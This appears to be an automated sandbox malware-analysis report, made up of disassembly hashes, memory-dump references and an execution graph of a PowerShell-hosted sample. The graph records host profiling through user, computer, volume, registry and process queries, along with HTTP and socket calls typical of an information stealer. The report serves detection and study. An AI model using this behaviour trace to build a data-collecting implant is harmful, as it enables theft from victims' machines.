                                                                                                                                                                        • Instruction ID: 3b2f48a74747615e66c44b0441240b54e387f38ca967e0c83646f9220d584e33
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b3cfaecab8866a51375130e6b4941c7ba4ecf0ca5181f0e7ea5f4e0e0a135ca
                                                                                                                                                                        • Instruction Fuzzy Hash: 8CF0C9749003049BD764DB79D89879ABBE9EB44314F00546ED65EC7340DB39A8818B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 588d9cd069c902e336490f723e2f2f22222baf8bf8e2c707f5fc64a885dc9772
                                                                                                                                                                        • Instruction ID: e0749409aa98f917a7d381abeba4ddd2f8fcf0ca157bd4beebbbe89ce35003da
                                                                                                                                                                        • Opcode Fuzzy Hash: 588d9cd069c902e336490f723e2f2f22222baf8bf8e2c707f5fc64a885dc9772
                                                                                                                                                                        • Instruction Fuzzy Hash: DFE0DF3970421487CB086774A42C2AE7A96EBC5728F01002ED70A87341CF786C0287DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b8142cad73b04d5aabb39b14177ed996e5f7686c4f752d12bba9caea83e957ce
                                                                                                                                                                        • Instruction ID: 33ab860f00568f7a46d1c5d7f47afea516c7e3866b11af0f9bb70c39d89a4074
                                                                                                                                                                        • Opcode Fuzzy Hash: b8142cad73b04d5aabb39b14177ed996e5f7686c4f752d12bba9caea83e957ce
                                                                                                                                                                        • Instruction Fuzzy Hash: 84D09E16B0A2265BFD94B5AE5C907BBE1CECAC74A1B4A017F9A05DF242ED44CC0507F1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d67bb581e23c7239a260ecc5d47f178eec9c45a5efcc4f7b2bc3b227d02ffbd1
                                                                                                                                                                        • Instruction ID: 7018285d265858d681f3fb933e050b35e906234476b14e8f624d4b1a349f6f89
                                                                                                                                                                        • Opcode Fuzzy Hash: d67bb581e23c7239a260ecc5d47f178eec9c45a5efcc4f7b2bc3b227d02ffbd1
                                                                                                                                                                        • Instruction Fuzzy Hash: 1BE08C35740614478611AA2EA81085FB6DADBC4662344446EE15987300DEA4E8068BD6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                        • Instruction ID: ff92662eafdb0094743fd50d6b10b84f5296d34af06944e1080b304aa61a9523
                                                                                                                                                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                        • Instruction Fuzzy Hash: 59E08631B04018DB8B08D699D4514E9F7A9DBCC220F04847FD90AA7750DA32591686E1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ff7d27ce04746090da35647e7759ec25f04b1c8059aa268054e59ccdd4264205
                                                                                                                                                                        • Instruction ID: 0b165a2b30851794dee8a690ab9a7aa66276134bf4b25681c763f217c230d477
                                                                                                                                                                        • Opcode Fuzzy Hash: ff7d27ce04746090da35647e7759ec25f04b1c8059aa268054e59ccdd4264205
                                                                                                                                                                        • Instruction Fuzzy Hash: C2E01A35854109CFCB0DFBA4D8AA8E9BF38FA11305B41159ED516576A2DA302A86CFC0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c41d1a15f77208fda0bb42de2ebe61f147ab458d8ec498638b36c947841339b8
                                                                                                                                                                        • Instruction ID: 6f8e89b56d3b2d5ec57955f3d2ca416805cc1beccca481f697da8946c5c46a9a
                                                                                                                                                                        • Opcode Fuzzy Hash: c41d1a15f77208fda0bb42de2ebe61f147ab458d8ec498638b36c947841339b8
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AE0D834A082058FC749DFB4D09646ABFB8EF45308B014169DE0697351D6309C41CF81
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d4995b55a588db5c71e0f6a60ba5424f0ea5b9d4924230b7334d757bfb1889f0
                                                                                                                                                                        • Instruction ID: 31756e48616cdb493dc1968995627c00258a0f41a71b082a95d4131a0fa8f1ae
                                                                                                                                                                        • Opcode Fuzzy Hash: d4995b55a588db5c71e0f6a60ba5424f0ea5b9d4924230b7334d757bfb1889f0
                                                                                                                                                                        • Instruction Fuzzy Hash: DCE01A70D0414A9F9B80EFBCC4812AEFFF0EF5A204B6085EEC958EB201E6324651DB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                        • Instruction ID: 44395b00df968f29d285aae8058528ecafd05b204046487d54c2584093c6d499
                                                                                                                                                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                        • Instruction Fuzzy Hash: E8D067B0D04209DF8B80EFADC94156EFBF4EB48205F6085AA8919E7301E7329A12CBD1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: aad1f9676b11fb5a213c10b037466b2a40c78de98c33f85ac669d736eec94c92
                                                                                                                                                                        • Instruction ID: 60112881b47d016523e0de5c65dad2e1a6913077f8bd3466659a3681e2b26fbb
                                                                                                                                                                        • Opcode Fuzzy Hash: aad1f9676b11fb5a213c10b037466b2a40c78de98c33f85ac669d736eec94c92
                                                                                                                                                                        • Instruction Fuzzy Hash: ACD06731844109CBCB08EBA4E86B4FDBB74FA54305F4151ADE91752691EA312A5ACFC5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b851d0b95a1574629286cb3dbaff03d31ed5f8076b85b5c5954266f73f9d9c2a
                                                                                                                                                                        • Instruction ID: e55d98f8d73e9578bf1d18e6de7c9ef4c4fd0d8fe2c2340fb19100b2df6c9791
                                                                                                                                                                        • Opcode Fuzzy Hash: b851d0b95a1574629286cb3dbaff03d31ed5f8076b85b5c5954266f73f9d9c2a
                                                                                                                                                                        • Instruction Fuzzy Hash: 1FD05B34E4420ACFCB18EF64D45646EBBF5EB45305F004159DE0593340E6306D01CFC1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b2984c0906bff5fff34a316afb24667c40a817d53e4eda4d9a96323e15e9ddc2
                                                                                                                                                                        • Instruction ID: 3cb51dfd90c6e3a093a2814cbd83202eed4d00f22274587096191b581ad34008
                                                                                                                                                                        • Opcode Fuzzy Hash: b2984c0906bff5fff34a316afb24667c40a817d53e4eda4d9a96323e15e9ddc2
                                                                                                                                                                        • Instruction Fuzzy Hash: 2FD05E3804D3C18FC7178B3C94944083F305D0311531504DDD486DF9A3C626848ACB17
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 69bdd88499bface2891761d27397573578990b68aaf7d97ff21bd559cd416cde
                                                                                                                                                                        • Instruction ID: 5da66288ae27d5548d259cd4be12150e9f4b62ff8fdbafcf529e78b4ee55243b
                                                                                                                                                                        • Opcode Fuzzy Hash: 69bdd88499bface2891761d27397573578990b68aaf7d97ff21bd559cd416cde
                                                                                                                                                                        • Instruction Fuzzy Hash: FEC08C1400E3D00FEF039338CC9A1013FB10D8311930E01CAC0C1CF8A3C968884ACB43
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 83d14b80a60cada217421fbbc234dbfcca62d1028a5caf0d2473bd25f4c4f5e7
                                                                                                                                                                        • Instruction ID: ebd9e29ff5a0fd89d9429852cd16e446c9e799b65b3bc8a8919c407f4a5a5328
                                                                                                                                                                        • Opcode Fuzzy Hash: 83d14b80a60cada217421fbbc234dbfcca62d1028a5caf0d2473bd25f4c4f5e7
                                                                                                                                                                        • Instruction Fuzzy Hash: 58B0923104470ACFC2496F75E4488157329BB4021978008ACE90E4AA928F3AE88ACA45
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $cqk$4'^q$4'^q$4'^q$4'^q$84|l$84|l$piFk$tP^q$tP^q$r~l$r~l
                                                                                                                                                                        • API String ID: 0-2175947571
                                                                                                                                                                        • Opcode ID: 1d12706077fa8e6ecfa07862f79e4059c065092b48cc26194bcdfe1ff8dbca65
                                                                                                                                                                        • Instruction ID: f8029429ef5d1a68556e84f7d3bf14abe93b257f2d3c74326dcf3d7c4cf00547
                                                                                                                                                                        • Opcode Fuzzy Hash: 1d12706077fa8e6ecfa07862f79e4059c065092b48cc26194bcdfe1ff8dbca65
                                                                                                                                                                        • Instruction Fuzzy Hash: C3D176B5B0421EAFCB149B6884046AABBF6EFC5315F14C46BDA15CF341DB31C8A5C792
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$tl$tl
                                                                                                                                                                        • API String ID: 0-4116796712
                                                                                                                                                                        • Opcode ID: 8751ce02940f029fffd2a6783f52d2218e174289fd420e8eff53a920ff2e0c96
                                                                                                                                                                        • Instruction ID: 0d1ac0e5bf9af22641bf8e0e7a410822cd19132d336885e20c9a76e3e20f0ae3
                                                                                                                                                                        • Opcode Fuzzy Hash: 8751ce02940f029fffd2a6783f52d2218e174289fd420e8eff53a920ff2e0c96
                                                                                                                                                                        • Instruction Fuzzy Hash: EEA197B27043199FDB148A69880177ABBFAAFC5324F14846FD909CF391DE31C865C3A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: fcq$4'^q$4'^q$4'^q$4'^q$r~l$r~l
                                                                                                                                                                        • API String ID: 0-1826034293
                                                                                                                                                                        • Opcode ID: b0287f0d68a719e72e98eb3c802c4bf8ed6ae7b751f5dec6d9c10b9148499492
                                                                                                                                                                        • Instruction ID: ba8de7777f4d9d9ed54f9644e448896ad71a7d03fe59781d8716ccc2d5542223
                                                                                                                                                                        • Opcode Fuzzy Hash: b0287f0d68a719e72e98eb3c802c4bf8ed6ae7b751f5dec6d9c10b9148499492
                                                                                                                                                                        • Instruction Fuzzy Hash: E6F155B170421A8FCB149B6CC45076ABBE6AFC5315F14847AD50ACF781EB32DCA6C7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q$tl$tl
                                                                                                                                                                        • API String ID: 0-750435783
                                                                                                                                                                        • Opcode ID: ee60c1fb7b89a7d810a92f989d1dc1bc162f55d389126e2a302ba5de4d6243d0
                                                                                                                                                                        • Instruction ID: abe0cd4864eeb0de39b9516efd499adeadb861ba6bebd985f010abc31e0f4633
                                                                                                                                                                        • Opcode Fuzzy Hash: ee60c1fb7b89a7d810a92f989d1dc1bc162f55d389126e2a302ba5de4d6243d0
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E5137F270430E9FCB245B698805766BFF6AFC6629F2484BAD405CB741DB31C8A5C7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: fd01e582dfb0ef7781b981c53b28078cda439904f2d8b32715bfeccbde70c701
                                                                                                                                                                        • Instruction ID: b8dc9ee19696491f719cbefa9b651499159f0d298feba0069690efe9a1e10eed
                                                                                                                                                                        • Opcode Fuzzy Hash: fd01e582dfb0ef7781b981c53b28078cda439904f2d8b32715bfeccbde70c701
                                                                                                                                                                        • Instruction Fuzzy Hash: E9B1A274A003199FDB54DFA9D980A9DFBF2FF88301F14862AE419AB345DB70A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: e30c2e7f4e75b493298ff89077c795e66f666c5d21b8f706064e7bc7ff77706c
                                                                                                                                                                        • Instruction ID: 66933c33ba0fabdebe5cd8b03fb312ba1e5378d0ebdd74ea867ed4e35a0c0cd4
                                                                                                                                                                        • Opcode Fuzzy Hash: e30c2e7f4e75b493298ff89077c795e66f666c5d21b8f706064e7bc7ff77706c
                                                                                                                                                                        • Instruction Fuzzy Hash: D2B18374E102199FDB54DFA9D980A9DFBF2FF48301F14862AE419AB344DB70A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: xo^$xo^$xo^$xo^$xo^
                                                                                                                                                                        • API String ID: 0-2425003715
                                                                                                                                                                        • Opcode ID: 9e8d5019a979e861e50e15fcd5e739d32346eaed0b760b7998cd442119b61df1
                                                                                                                                                                        • Instruction ID: 9a50ee79e95ad5de7cd741b28440bb9a7c90cbabe1a9fb49b663c37970192c7e
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e8d5019a979e861e50e15fcd5e739d32346eaed0b760b7998cd442119b61df1
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A31295251E3C15FD30B873998A81807FB0AF671A871E01EBC1E8CF4A7D819285BC76B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: xo^$xo^$xo^$xo^
                                                                                                                                                                        • API String ID: 0-901232421
                                                                                                                                                                        • Opcode ID: 90beae5a2af84eefa79ed98f008175f9f6f43d58f5d74a54461ffe2a56490d00
                                                                                                                                                                        • Instruction ID: 68d47e9f53bc6de1e4ae300c4bf67abaa55ef9930e231cc87ae12bf256853342
                                                                                                                                                                        • Opcode Fuzzy Hash: 90beae5a2af84eefa79ed98f008175f9f6f43d58f5d74a54461ffe2a56490d00
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E41255150F3C26FD307873898A91957FB0AD1722435E42C7C4E4CF8B3DA68586AC763
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: xo^$xo^$xo^$xo^
                                                                                                                                                                        • API String ID: 0-901232421
                                                                                                                                                                        • Opcode ID: 240f9bb00439bb239e2311fbbbf95d33d2a2f891805a455f52d2156476b095c0
                                                                                                                                                                        • Instruction ID: 3a0a36b43a95cdb2bf522db4e9ea63350cea7bb908b0e08eb711729b2d3acba6
                                                                                                                                                                        • Opcode Fuzzy Hash: 240f9bb00439bb239e2311fbbbf95d33d2a2f891805a455f52d2156476b095c0
                                                                                                                                                                        • Instruction Fuzzy Hash: F6416F6161A3C15FD707DB2C98A45817FF0AF9725870A05E7D0D4CF5A7DA14984AC3A3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2125118731
                                                                                                                                                                        • Opcode ID: 9a3a3e7a960dd83a04ccff62a9af9546d4a368e28d4d84c4543724c01405d533
                                                                                                                                                                        • Instruction ID: 4df016c97eecb4ae05fc703b233d1f61a113a4e90c5ec4edc683f88d3b2c2bb1
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a3a3e7a960dd83a04ccff62a9af9546d4a368e28d4d84c4543724c01405d533
                                                                                                                                                                        • Instruction Fuzzy Hash: EA216BF271030A9BDB34597A9801B37B7DB5BC0719F26886AA505CF781DD75C8618361
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2049395529
                                                                                                                                                                        • Opcode ID: 0ca78e119a2f766d6dbefc79e312f89c1885a75a77e3dedbb71d6fdcf6ce8b0b
                                                                                                                                                                        • Instruction ID: 5c39c80c8943651b8ac1717efe941b66b6926cfbdc183cce1f3c1b43245b99a4
                                                                                                                                                                        • Opcode Fuzzy Hash: 0ca78e119a2f766d6dbefc79e312f89c1885a75a77e3dedbb71d6fdcf6ce8b0b
                                                                                                                                                                        • Instruction Fuzzy Hash: B7016671B0826A4FC72A522C58202A52BF69F8665472905ABC041CF342DE269C9B8392

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:12.6%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:5%
                                                                                                                                                                        Total number of Nodes:202
                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                        execution_graph 11059 430e03 GetVolumeInformationA 11060 430e5c 11059->11060 10873 431442 10874 431454 GetUserNameA 10873->10874 10876 43ddc2 10877 43dde2 10876->10877 10878 43ddf0 10877->10878 10881 433a6e 10877->10881 10887 433912 CreateStreamOnHGlobal 10877->10887 10882 433a80 10881->10882 10888 4169bb InternetReadFile 10882->10888 10883 433b3e CloseWindow 10885 433bc7 10883->10885 10885->10878 11064 431480 11065 431492 GetComputerNameA 11064->11065 10889 440f40 10890 440f57 LoadLibraryA 10889->10890 10892 441399 10890->10892 10893 401046 VirtualAlloc 10894 401070 10893->10894 10895 438fc5 Sleep 10896 43ca4a 10897 43ca5c 10896->10897 10904 416173 10897->10904 10906 41617c 10897->10906 10908 4169bb InternetReadFile 10897->10908 10909 416c35 10897->10909 10912 4161f2 10897->10912 10905 416183 HttpOpenRequestA 10904->10905 10907 416183 HttpOpenRequestA 10906->10907 10910 416c6a lstrlenA 10909->10910 10911 416c7a HttpSendRequestA 10910->10911 10913 41620d lstrlenA 10912->10913 10915 4167cd lstrlenA 10913->10915 10916 4167ea RtlAllocateHeap 10915->10916 10917 416806 memcpy 10916->10917 10919 41684d lstrlenA memcpy 10917->10919 10920 41687b lstrlenA 10919->10920 10921 416891 lstrlenA memcpy 10920->10921 11067 41b408 recv 10923 43d748 10924 43d781 10923->10924 10954 41770f InternetReadFile 10924->10954 10925 43d7b4 10930 41770f InternetReadFile 10925->10930 10926 43d834 10953 41770f InternetReadFile 10926->10953 10927 43d8b4 10931 431283 RegQueryValueExA 10927->10931 10932 431921 RegOpenKeyExA 10927->10932 10933 4322e0 Process32Next 10927->10933 10934 431eaa RegEnumKeyExA 10927->10934 10935 4319c9 GetSystemInfo 10927->10935 10936 431248 RegOpenKeyExA 10927->10936 10937 43226f CreateToolhelp32Snapshot Process32First 10927->10937 10938 43156d HeapAlloc GetTimeZoneInformation 10927->10938 10939 4340d2 K32GetModuleFileNameExA 10927->10939 10940 431990 RegQueryValueExA 10927->10940 10941 4377b7 HeapAlloc GlobalMemoryStatusEx lstrlenA 10927->10941 10942 4312f5 HeapAlloc RegOpenKeyExA 10927->10942 10943 431e14 RegOpenKeyExA 10927->10943 10944 4316fe GetLocaleInfoA 10927->10944 10928 43d8f3 10945 427e70 14 API calls 10928->10945 10946 4278c6 14 API calls 10928->10946 10947 427506 39 API calls 10928->10947 10948 427a95 FindFirstFileA FindNextFileA StrCmpCA GetFileAttributesA 10928->10948 10949 42764a StrCmpCA GetFileAttributesA 10928->10949 10950 427bdb GetFileAttributesA 10928->10950 10951 4279b8 6 API calls 10928->10951 10929 43d94c 10930->10926 10931->10928 10932->10928 10933->10928 10934->10928 10935->10928 10936->10928 10937->10928 10938->10928 10939->10928 10940->10928 10941->10928 10942->10928 10943->10928 10944->10928 10945->10929 10946->10929 10947->10929 10948->10929 10949->10929 10950->10929 10951->10929 10953->10927 10955 4324cf memset 10956 43251e RegOpenKeyExA 10955->10956 10957 41b0cf 10958 41b0f5 connect 10957->10958 11068 43e893 11069 43e895 11068->11069 11078 40130b memset memset 11069->11078 11071 43e8b0 11072 4010c6 VirtualAllocExNuma 11071->11072 11073 43e8ba 11072->11073 11074 40168c GetPEB 11073->11074 11075 43e8c4 11074->11075 11076 43d191 OpenEventA 11075->11076 11077 43e8e2 11076->11077 11079 40135d 11078->11079 11080 43dc97 11081 43dcb4 11080->11081 11084 43335d 11081->11084 11085 433383 GetFileAttributesA 11084->11085 11093 434714 Process32Next 10963 43ce58 10964 43ce73 FindFirstFileA 10963->10964 11095 432018 11096 43203e RegQueryValueExA 11095->11096 11098 43901f 11099 43903b CreateThread 11098->11099 11101 439086 11099->11101 11102 43c9e3 11099->11102 11103 43ca1b 11102->11103 11104 431f9c RegQueryValueExA 11105 43dd23 11106 43dd3a 11105->11106 11109 43bcb5 memset 11106->11109 11110 43bd02 11109->11110 11116 43b345 2 API calls 11110->11116 11111 43be05 memset 11112 43be44 11111->11112 11117 43b345 2 API calls 11112->11117 11113 43bf28 memset 11114 43bf62 11113->11114 11118 43b345 2 API calls 11114->11118 11115 43c069 11116->11111 11117->11113 11118->11115 10976 41afe0 socket 